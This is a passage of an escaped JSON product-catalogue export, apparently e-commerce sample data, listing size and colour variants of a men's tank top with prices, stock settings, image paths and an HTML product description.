,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"610\":{\"sku\":\"MT03-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Primo Endurance Tank-XS-Yellow\",\"description\":\"<p>Chances are your workout goes beyond free weights, which is why the Primo Endurance Tank employs maximum versatility. Run, lift or play ball &ndash; this breathable mesh top will keep you cool during all your activities.<\\/p>\\n<p>&bull; Red heather tank with gray pocket.<br \\/>&bull; Chafe-resistant flatlock seams. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Contrast topstitching.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"primo-endurance-tank-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"611\":{\"sku\":\"MT03-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Primo Endurance Tank-S-Blue\",\"description\":\"<p>Chances are your workout goes beyond free weights, which is why the Primo Endurance Tank employs maximum versatility. Run, lift or play ball &ndash; this breathable mesh top will keep you cool during all your activities.<\\/p>\\n<p>&bull; Red heather tank with gray pocket.<br \\/>&bull; Chafe-resistant flatlock seams. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Contrast topstitching.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"primo-endurance-tank-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"612\":{\"sku\":\"MT03-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Primo Endurance Tank-S-Red\",\"description\":\"<p>Chances are your workout goes beyond free weights, which is why the Primo Endurance Tank employs maximum versatility. Run, lift or play ball &ndash; this breathable mesh top will keep you cool during all your activities.<\\/p>\\n<p>&bull; Red heather tank with gray pocket.<br \\/>&bull; Chafe-resistant flatlock seams. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Contrast topstitching.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"primo-endurance-tank-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"613\":{\"sku\":\"MT03-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Primo Endurance Tank-S-Yellow\",\"description\":\"<p>Chances are your workout goes beyond free weights, which is why the Primo Endurance Tank employs maximum versatility. Run, lift or play ball &ndash; this breathable mesh top will keep you cool during all your activities.<\\/p>\\n<p>&bull; Red heather tank with gray pocket.<br \\/>&bull; Chafe-resistant flatlock seams. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Contrast topstitching.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"primo-endurance-tank-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"614\":{\"sku\":\"MT03-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Primo Endurance Tank-M-Blue\",\"description\":\"<p>Chances are your workout goes beyond free weights, which is why the Primo Endurance Tank employs maximum versatility. Run, lift or play ball &ndash; this breathable mesh top will keep you cool during all your activities.<\\/p>\\n<p>&bull; Red heather tank with gray pocket.<br \\/>&bull; Chafe-resistant flatlock seams. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Contrast topstitching.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"primo-endurance-tank-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"615\":{\"sku\":\"MT03-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Primo Endurance Tank-M-Red\",\"description\":\"<p>Chances are your workout goes beyond free weights, which is why the Primo Endurance Tank employs maximum versatility. Run, lift or play ball &ndash; this breathable mesh top will keep you cool during all your activities.<\\/p>\\n<p>&bull; Red heather tank with gray pocket.<br \\/>&bull; Chafe-resistant flatlock seams. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Contrast topstitching.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"primo-endurance-tank-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"616\":{\"sku\":\"MT03-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Primo Endurance Tank-M-Yellow\",\"description\":\"<p>Chances are your workout goes beyond free weights, which is why the Primo Endurance Tank employs maximum versatility. Run, lift or play ball &ndash; this breathable mesh top will keep you cool during all your activities.<\\/p>\\n<p>&bull; Red heather tank with gray pocket.<br \\/>&bull; Chafe-resistant flatlock seams. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Contrast topstitching.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"primo-endurance-tank-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt03-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"617\":{\"sku\":\"MT03-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Primo Endurance Tank-L-Blue\",\"description\":\"<p>Chances are your workout goes beyond free weights, which is why the Primo Endurance Tank employs maximum versatility. Run, lift or play ball &ndash; this breathable mesh top will keep you cool during all your activities.<\\/p>\\n<p>&bull; Red heather tank with gray pocket.<br \\/>&bull; Chafe-resistant flatlock seams. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Contrast topstitching.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"primo-endurance-tank-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"618\":{\"sku\":\"MT03-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Primo Endurance Tank-L-Red\",\"description\":\"<p>Chances are your workout goes beyond free weights, which is why the Primo Endurance Tank employs maximum versatility. Run, lift or play ball &ndash; this breathable mesh top will keep you cool during all your activities.<\\/p>\\n<p>&bull; Red heather tank with gray pocket.<br \\/>&bull; Chafe-resistant flatlock seams. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Contrast topstitching.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"primo-endurance-tank-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"thumbnail_label\